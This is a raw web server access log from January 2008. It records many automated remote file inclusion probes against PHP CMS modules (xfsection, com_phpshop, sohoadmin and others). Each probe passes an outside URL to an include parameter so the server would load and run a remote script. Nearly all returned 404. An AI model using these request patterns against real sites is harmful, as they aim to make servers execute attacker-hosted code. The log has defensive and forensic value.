66.11.230.149 - - [11/Jan/2008:16:00:39 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
66.11.230.149 - - [11/Jan/2008:16:00:39 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
66.11.230.149 - - [11/Jan/2008:16:00:43 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:02:34 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:02:34 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:02:35 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:02:44 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:02:44 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:02:45 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:02:56 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:02:56 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
66.11.230.149 - - [11/Jan/2008:16:03:21 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
66.11.230.149 - - [11/Jan/2008:16:03:35 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
66.11.230.149 - - [11/Jan/2008:16:03:35 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
66.11.230.149 - - [11/Jan/2008:16:03:36 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:44 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:44 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:44 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:45 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:45 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:45 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:47 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:47 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:47 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:48 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:48 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:03:48 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:02 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:02 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:02 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:04 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:04 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:04 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:07 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:07 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:08 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:15 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:15 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.18.164.29 - - [11/Jan/2008:16:04:15 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:04:16 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:04:16 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:04:16 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:04:16 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:04:16 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
83.136.83.94 - - [11/Jan/2008:16:04:17 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
198.63.47.58 - - [11/Jan/2008:16:04:48 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
198.63.47.58 - - [11/Jan/2008:16:04:48 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
198.63.47.58 - - [11/Jan/2008:16:04:48 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
85.214.42.97 - - [11/Jan/2008:16:04:57 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.42.97 - - [11/Jan/2008:16:04:57 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.42.97 - - [11/Jan/2008:16:04:58 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.160.191.59 - - [11/Jan/2008:16:07:49 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.160.191.59 - - [11/Jan/2008:16:07:49 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.160.191.59 - - [11/Jan/2008:16:07:49 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
87.101.4.49 - - [11/Jan/2008:16:08:07 -0800] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.101.4.49 - - [11/Jan/2008:16:08:07 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
200.55.216.70 - - [11/Jan/2008:16:08:31 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.65" "www.projectpr.com"
58.145.192.10 - - [11/Jan/2008:16:08:32 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
58.145.192.10 - - [11/Jan/2008:16:08:33 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
58.145.192.10 - - [11/Jan/2008:16:08:34 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
61.67.192.5 - - [11/Jan/2008:16:10:18 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.160.191.59 - - [11/Jan/2008:16:10:53 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.76" "www.projectpr.com"
217.160.191.59 - - [11/Jan/2008:16:10:53 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.160.191.59 - - [11/Jan/2008:16:10:54 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
208.122.223.146 - - [11/Jan/2008:16:12:09 -0800] "GET /logs/access_070812.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.160.191.59 - - [11/Jan/2008:16:12:55 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:40 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:41 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:43 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:43 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [11/Jan/2008:16:13:44 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.74.150.192 - - [11/Jan/2008:16:14:48 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
195.15.2.85 - - [11/Jan/2008:16:16:37 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
58.145.192.10 - - [11/Jan/2008:16:17:12 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.808" "www.projectpr.com"
58.145.192.10 - - [11/Jan/2008:16:17:13 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
58.145.192.10 - - [11/Jan/2008:16:17:14 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
58.145.192.10 - - [11/Jan/2008:16:18:51 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.159.200.63 - - [11/Jan/2008:16:19:41 -0800] "GET /logs/access.log HTTP/1.0" 200 17062 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.projectpr.com"
193.0.78.8 - - [11/Jan/2008:16:20:40 -0800] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
193.0.78.8 - - [11/Jan/2008:16:20:40 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
193.0.78.8 - - [11/Jan/2008:16:20:40 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
82.112.124.79 - - [11/Jan/2008:16:24:21 -0800] "GET /logs/access_070912.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 278 "-" "libwww-perl/5.65" "www.projectpr.com"
82.112.124.79 - - [11/Jan/2008:16:24:22 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
82.112.124.79 - - [11/Jan/2008:16:24:22 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
122.132.140.60 - - [11/Jan/2008:16:27:05 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
122.132.140.60 - - [11/Jan/2008:16:27:10 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
122.132.140.60 - - [11/Jan/2008:16:27:16 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.10.155.237 - - [11/Jan/2008:16:28:25 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.italianviper.altervista.org/php/php4/com.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.74.150.192 - - [11/Jan/2008:16:32:56 -0800] "GET /logs/access_070912.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.74.150.192 - - [11/Jan/2008:16:32:57 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
217.148.95.149 - - [11/Jan/2008:16:36:06 -0800] "GET /logs/pagina.php?doc=http://www.usipime.com/adpics/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.projectpr.com"
217.148.95.149 - - [11/Jan/2008:16:36:06 -0800] "GET /pagina.php?doc=http://www.usipime.com/adpics/response??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.projectpr.com"
193.0.78.8 - - [11/Jan/2008:16:36:19 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 321 "-" "libwww-perl/5.803" "www.projectpr.com"
82.112.124.79 - - [11/Jan/2008:16:38:33 -0800] "GET /logs/access_070812.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:16:39:05 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 337 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:16:39:05 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [11/Jan/2008:16:39:05 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.15.12.20 - - [11/Jan/2008:16:40:20 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 337 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [11/Jan/2008:16:40:21 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [11/Jan/2008:16:40:21 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:16:45:48 -0800] "GET /admin.php?include_path=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:16:45:52 -0800] "GET //inc/design.inc.php?dir[inc]=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:16:45:52 -0800] "GET /logs//inc/design.inc.php?dir[inc]=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:16:45:52 -0800] "GET /logs/admin.php?include_path=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:16:46:28 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:16:46:28 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 314 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [11/Jan/2008:16:46:29 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
71.6.167.234 - - [11/Jan/2008:16:47:30 -0800] "GET /logs/checkout.php?abs_path=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.projectpr.com"
71.6.167.234 - - [11/Jan/2008:16:47:30 -0800] "GET /checkout.php?abs_path=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.projectpr.com"
71.6.167.234 - - [11/Jan/2008:16:47:35 -0800] "GET /index.php?abs_path=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
71.6.167.234 - - [11/Jan/2008:16:47:35 -0800] "GET /logs/index.php?abs_path=http://www.logosmin.org/copiedoldsite/components/com_magazine/layouts/css/.contr_css/contr.txt?? HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
